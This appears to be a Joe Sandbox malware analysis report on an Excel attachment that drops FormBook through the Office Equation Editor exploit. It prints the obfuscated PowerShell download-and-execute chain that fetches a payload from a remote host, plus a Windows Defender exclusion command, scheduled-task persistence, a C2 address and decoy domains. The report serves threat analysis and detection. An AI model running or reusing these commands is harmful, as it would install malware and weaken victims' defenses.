Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO.78NO9.xls

Overview

General Information

Sample name:PO.78NO9.xls
Analysis ID:1527625
MD5:f4d2762d6fc4b70c3c88ab984e74d7cf
SHA1:ce98c26ec0a34cd39337e94afb3d5cc8409bf944
SHA256:781b57f2c750077fea3540b45ab5be0a9f1eac03b02d5ebbd89e4558ec130e50
Tags:xlsuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Scheduled temp file as task from temp location
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3524 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3792 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3168 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3316 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 2660 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 1368 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • aspnet_regbrowsers.exe (PID: 2452 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" MD5: 04AA198D72229AEED129DC20201BF030)
            • powershell.exe (PID: 2980 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • schtasks.exe (PID: 3328 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp" MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
            • aspnet_regbrowsers.exe (PID: 3760 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" MD5: 04AA198D72229AEED129DC20201BF030)
              • explorer.exe (PID: 1244 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
                • mstsc.exe (PID: 4060 cmdline: "C:\Windows\SysWOW64\mstsc.exe" MD5: 4676AAA9DDF52A50C829FEDB4EA81E54)
                  • cmd.exe (PID: 4028 cmdline: /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe" MD5: AD7B9C14083B52BC532FBA5948342B98)
  • taskeng.exe (PID: 2416 cmdline: taskeng.exe {6F06CFDC-8B46-4289-9A59-403AE8C9352A} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1] MD5: 65EA57712340C09B1B0C427B4848AE05)
    • niLILOT.exe (PID: 3724 cmdline: C:\Users\user\AppData\Roaming\niLILOT.exe MD5: 04AA198D72229AEED129DC20201BF030)
  • cleanup
{"C2 list": ["www.lefeetlab.net/gwdv/"], "decoy": ["boyxlife.cyou", "v9.delivery", "intelliflow.run", "gstech.cloud", "qzbqtu.cyou", "splunk-test.dev", "nasocnite.xyz", "outdooradventuregearhub511.shop", "uptobisone.website", "andyouwannafuck.cloud", "blancslatespeedshop.com", "technical.cash", "highercall.net", "incronizid.dev", "tzx9y.rest", "brakpanbrand.net", "stimna.love", "thefarmerzpizza.info", "full4d.net", "lingerie-16071.bond", "ouc24.buzz", "spanish-classes-13883.bond", "slhub.xyz", "redcampgear.shop", "prefabricated-homes-48151.bond", "senior-dating-73474.bond", "betnirmala.pro", "xdns.dev", "nvpvr.info", "my-tournament.live", "20040523.xyz", "tb4r.net", "papayan.xyz", "longbeibusiness.life", "workweek.world", "besuperclinic.com", "online-dating-68375.bond", "yourdentalcare.shop", "seo7x.digital", "back-pain-treatment-11921.bond", "hme8h3f.shop", "cip138max.site", "bet-flix.live", "lmodt.info", "m-tb-zy.shop", "ylu8g260nq.cyou", "victorygameconsiderations.homes", "accountingcourse06.shop", "blackwavetattoostudio.com", "divineworks.store", "momomooncakes.net", "kemari.click", "3rhis.shop", "familyswim.xyz", "pp557.vip", "3dnu3uix.college", "massage-courses-infinity.sbs", "jandjacres.net", "dental-implants-84866.bond", "mahjowefvvcne.space", "inkalternatif188bet.net", "birthinjurylawyers825880.online", "yycvoc.sbs", "mdnews.tech"]}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6035E009.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x18f8:$obj2: \objdata
  • 0x190e:$obj3: \objupdate
  • 0x18d4:$obj4: \objemb
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sweetnessisbthebesttoolevermadefromthehumanmouthwhichfoundverylongtimebeforesweetnessgivinghappinessandentirethingsforhumanwhohave_______nicebeautifulwords[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x18f8:$obj2: \objdata
  • 0x190e:$obj3: \objupdate
  • 0x18d4:$obj4: \objemb
SourceRuleDescriptionAuthorStrings
0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      0000001B.00000002.637430242.0000000000080000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18819:$sqlite3step: 68 34 1C 7B E1
      • 0x1892c:$sqlite3step: 68 34 1C 7B E1
      • 0x18848:$sqlite3text: 68 38 2A 90 C5
      • 0x1896d:$sqlite3text: 68 38 2A 90 C5
      • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 26 entries

      Exploits

      barindex
      Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 38.240.41.28, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3168, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170
      Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3168, TargetFilename: C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS

      System Summary

      barindex
      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0
      Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49170, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3168, Protocol: tcp, SourceIp: 38.240.41.28, SourceIsIpv6: false, SourcePort: 80
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjR
      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 